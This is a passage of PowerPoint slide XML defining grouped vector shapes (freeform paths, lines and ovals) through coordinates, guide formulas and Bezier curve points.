                        <a:lnTo>
                          <a:pt x="690" y="165"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="690" y="130"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="20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8" name="Oval 1790"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3010" y="245"/>
                    <a:ext cx="20" cy="5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 algn="ctr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94" name="Group 1791"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2992" y="815"/>
                <a:ext cx="287" cy="223"/>
                <a:chOff x="2988" y="817"/>
                <a:chExt cx="287" cy="223"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="527" name="Group 1792"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2988" y="976"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="548" name="Freeform 1793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" name="Freeform 1794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0" name="Freeform 1795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8" name="Group 1796"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3088" y="949"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="545" name="Freeform 1797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6" name="Freeform 1798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7" name="Freeform 1799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9" name="Group 1800"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3188" y="922"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="542" name="Freeform 1801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3" name="Freeform 1802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4" name="Freeform 1803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30" name="Group 1804"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2988" y="871"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="539" name="Freeform 1805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0" name="Freeform 1806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1" name="Freeform 1807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31" name="Group 1808"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3088" y="844"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="536" name="Freeform 1809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" name="Freeform 1810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8" name="Freeform 1811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32" name="Group 1812"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3188" y="817"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="533" name="Freeform 1813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" name="Freeform 1814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" name="Freeform 1815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95" name="Group 1816"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2758" y="846"/>
                <a:ext cx="187" cy="196"/>
                <a:chOff x="2748" y="859"/>
                <a:chExt cx="187" cy="196"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="511" name="Group 1817"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2748" y="991"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="524" name="Freeform 1818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5" name="Freeform 1819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6" name="Freeform 1820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12" name="Group 1821"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2848" y="964"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="521" name="Freeform 1822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1823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3" name="Freeform 1824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13" name="Group 1825"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2748" y="886"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="518" name="Freeform 1826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9" name="Freeform 1827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0" name="Freeform 1828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14" name="Group 1829"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2848" y="859"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="515" name="Freeform 1830"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2988" y="431"/>
                    <a:ext cx="207" cy="152"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1354"/>
                      <a:gd name="T1" fmla="*/ 990 h 990"/>
                      <a:gd name="T2" fmla="*/ 0 w 1354"/>
                      <a:gd name="T3" fmla="*/ 364 h 990"/>
                      <a:gd name="T4" fmla="*/ 711 w 1354"/>
                      <a:gd name="T5" fmla="*/ 175 h 990"/>
                      <a:gd name="T6" fmla="*/ 1354 w 1354"/>
                      <a:gd name="T7" fmla="*/ 0 h 990"/>
                      <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                      <a:gd name="T9" fmla="*/ 626 h 990"/>
                      <a:gd name="T10" fmla="*/ 711 w 1354"/>
                      <a:gd name="T11" fmla="*/ 796 h 990"/>
                      <a:gd name="T12" fmla="*/ 0 w 1354"/>
                      <a:gd name="T13" fmla="*/ 990 h 99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54"/>
                      <a:gd name="T22" fmla="*/ 0 h 990"/>
                      <a:gd name="T23" fmla="*/ 1354 w 1354"/>
                      <a:gd name="T24" fmla="*/ 990 h 99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54" h="990">
                        <a:moveTo>
                          <a:pt x="0" y="990"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="364"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="711" y="175"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1354" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1354" y="626"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="711" y="796"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="99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6" name="Freeform 1831"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3000" y="471"/>
                    <a:ext cx="86" cy="98"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 560 w 560"/>
                      <a:gd name="T1" fmla="*/ 0 h 636"/>
                      <a:gd name="T2" fmla="*/ 560 w 560"/>
                      <a:gd name="T3" fmla="*/ 485 h 636"/>
                      <a:gd name="T4" fmla="*/ 0 w 560"/>
                      <a:gd name="T5" fmla="*/ 636 h 636"/>
                      <a:gd name="T6" fmla="*/ 0 w 560"/>
                      <a:gd name="T7" fmla="*/ 152 h 636"/>
                      <a:gd name="T8" fmla="*/ 560 w 560"/>
                      <a:gd name="T9" fmla="*/ 0 h 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0"/>
                      <a:gd name="T16" fmla="*/ 0 h 636"/>
                      <a:gd name="T17" fmla="*/ 560 w 560"/>
                      <a:gd name="T18" fmla="*/ 636 h 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0" h="636">
                        <a:moveTo>
                          <a:pt x="560" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="560" y="485"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="636"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="152"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56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7" name="Freeform 1832"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3100" y="445"/>
                    <a:ext cx="86" cy="97"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 562 w 562"/>
                      <a:gd name="T1" fmla="*/ 0 h 633"/>
                      <a:gd name="T2" fmla="*/ 562 w 562"/>
                      <a:gd name="T3" fmla="*/ 482 h 633"/>
                      <a:gd name="T4" fmla="*/ 0 w 562"/>
                      <a:gd name="T5" fmla="*/ 633 h 633"/>
                      <a:gd name="T6" fmla="*/ 0 w 562"/>
                      <a:gd name="T7" fmla="*/ 151 h 633"/>
                      <a:gd name="T8" fmla="*/ 562 w 562"/>
                      <a:gd name="T9" fmla="*/ 0 h 6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62"/>
                      <a:gd name="T16" fmla="*/ 0 h 633"/>
                      <a:gd name="T17" fmla="*/ 562 w 562"/>
                      <a:gd name="T18" fmla="*/ 633 h 6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62" h="633">
                        <a:moveTo>
                          <a:pt x="562" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="562" y="482"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="633"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="151"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56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96" name="Group 1833"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2866" y="59"/>
                <a:ext cx="295" cy="217"/>
                <a:chOff x="3744" y="572"/>
                <a:chExt cx="295" cy="217"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="497" name="Freeform 1834"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3744" y="572"/>
                  <a:ext cx="295" cy="217"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1354"/>
                    <a:gd name="T1" fmla="*/ 990 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 1354"/>
                    <a:gd name="T3" fmla="*/ 364 h 990"/>
                    <a:gd name="T4" fmla="*/ 711 w 1354"/>
                    <a:gd name="T5" fmla="*/ 175 h 990"/>
                    <a:gd name="T6" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T7" fmla="*/ 0 h 990"/>
                    <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T9" fmla="*/ 626 h 990"/>
                    <a:gd name="T10" fmla="*/ 711 w 1354"/>
                    <a:gd name="T11" fmla="*/ 796 h 990"/>
                    <a:gd name="T12" fmla="*/ 0 w 1354"/>
                    <a:gd name="T13" fmla="*/ 990 h 99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54"/>
                    <a:gd name="T22" fmla="*/ 0 h 990"/>
                    <a:gd name="T23" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T24" fmla="*/ 990 h 99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54" h="990">
                      <a:moveTo>
                        <a:pt x="0" y="990"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="990"/>
                      </a:lnTo>
                      <a:close/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98" name="Line 1835"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3764" y="648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99" name="Line 1836"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3800" y="639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Line 1837"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3835" y="629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01" name="Line 1838"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3871" y="619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Line 1839"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3907" y="609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03" name="Line 1840"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3942" y="599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04" name="Line 1841"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3978" y="589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05" name="Line 1842"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4015" y="579"/>
                  <a:ext cx="0" cy="13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06" name="Line 1843"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3745" y="593"/>
                  <a:ext cx="294" cy="8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Line 1844"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3745" y="618"/>
                  <a:ext cx="294" cy="8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Line 1845"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3745" y="644"/>
                  <a:ext cx="294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Line 1846"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3744" y="669"/>
                  <a:ext cx="294" cy="8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10" name="Line 1847"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3744" y="694"/>
                  <a:ext cx="294" cy="8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62" name="Group 1848"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="7486091" y="2606091"/>
              <a:ext cx="1057275" cy="488950"/>
              <a:chOff x="1570" y="-4084"/>
              <a:chExt cx="8289" cy="3839"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="563" name="Freeform 1849"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5496" y="-1056"/>
                <a:ext cx="212" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 40 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 77 h 90"/>
                  <a:gd name="T16" fmla="*/ 74 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="74" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="8"/>
                      <a:pt x="42" y="0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0" y="90"/>
                      <a:pt x="40" y="90"/>
                      <a:pt x="40" y="90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2" y="80"/>
                      <a:pt x="74" y="79"/>
                      <a:pt x="77" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="67"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="74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64" name="Freeform 1850"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5453" y="-1039"/>
                <a:ext cx="187" cy="210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 79 h 89"/>
                  <a:gd name="T2" fmla="*/ 16 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 7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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="89"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="16" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="43"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="49" y="7"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="66" y="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65" name="Freeform 1851"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5522" y="-963"/>
                <a:ext cx="49" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 21"/>
                  <a:gd name="T1" fmla="*/ 22 h 25"/>
                  <a:gd name="T2" fmla="*/ 4 w 21"/>
                  <a:gd name="T3" fmla="*/ 17 h 25"/>
                  <a:gd name="T4" fmla="*/ 3 w 21"/>
                  <a:gd name="T5" fmla="*/ 3 h 25"/>
                  <a:gd name="T6" fmla="*/ 17 w 21"/>
                  <a:gd name="T7" fmla="*/ 8 h 25"/>
                  <a:gd name="T8" fmla="*/ 18 w 21"/>
                  <a:gd name="T9" fmla="*/ 2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25"/>
                  <a:gd name="T17" fmla="*/ 21 w 21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25">
                    <a:moveTo>
                      <a:pt x="18" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="25"/>
                      <a:pt x="8" y="23"/>
                      <a:pt x="4" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="0" y="6"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="17" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="21" y="19"/>
                      <a:pt x="18" y="2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66" name="Freeform 1852"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5538" y="-945"/>
                <a:ext cx="17" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 7"/>
                  <a:gd name="T1" fmla="*/ 8 h 9"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 9"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 1 h 9"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 3 h 9"/>
                  <a:gd name="T8" fmla="*/ 6 w 7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9"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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9">
                    <a:moveTo>
                      <a:pt x="6" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="9"/>
                      <a:pt x="3" y="8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6" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="5"/>
                      <a:pt x="7" y="7"/>
                      <a:pt x="6" y="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67" name="Freeform 1853"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5517" y="-1006"/>
                <a:ext cx="57" cy="83"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 0 w 24"/>
                  <a:gd name="T3" fmla="*/ 30 h 35"/>
                  <a:gd name="T4" fmla="*/ 9 w 24"/>
                  <a:gd name="T5" fmla="*/ 34 h 35"/>
                  <a:gd name="T6" fmla="*/ 19 w 24"/>
                  <a:gd name="T7" fmla="*/ 33 h 35"/>
                  <a:gd name="T8" fmla="*/ 24 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 35"/>
                  <a:gd name="T10" fmla="*/ 5 w 24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35"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 35 h 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35">
                    <a:moveTo>
                      <a:pt x="5" y="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1"/>
                      <a:pt x="4" y="33"/>
                      <a:pt x="9" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="35"/>
                      <a:pt x="18" y="34"/>
                      <a:pt x="19" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="4"/>
                      <a:pt x="24" y="4"/>
                      <a:pt x="24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68" name="Freeform 1854"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5517" y="-1070"/>
                <a:ext cx="78" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 1 w 33"/>
                  <a:gd name="T3" fmla="*/ 24 h 32"/>
                  <a:gd name="T4" fmla="*/ 14 w 33"/>
                  <a:gd name="T5" fmla="*/ 31 h 32"/>
                  <a:gd name="T6" fmla="*/ 29 w 33"/>
                  <a:gd name="T7" fmla="*/ 29 h 32"/>
                  <a:gd name="T8" fmla="*/ 33 w 33"/>
                  <a:gd name="T9" fmla="*/ 5 h 32"/>
                  <a:gd name="T10" fmla="*/ 5 w 33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3"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 33 w 33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3" h="32">
                    <a:moveTo>
                      <a:pt x="5" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="24"/>
                      <a:pt x="1" y="24"/>
                      <a:pt x="1" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="6" y="29"/>
                      <a:pt x="14" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="32"/>
                      <a:pt x="29" y="31"/>
                      <a:pt x="29" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="5"/>
                      <a:pt x="33" y="5"/>
                      <a:pt x="33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69" name="Freeform 1855"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5368" y="-1022"/>
                <a:ext cx="213" cy="212"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 78 h 90"/>
                  <a:gd name="T16" fmla="*/ 75 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
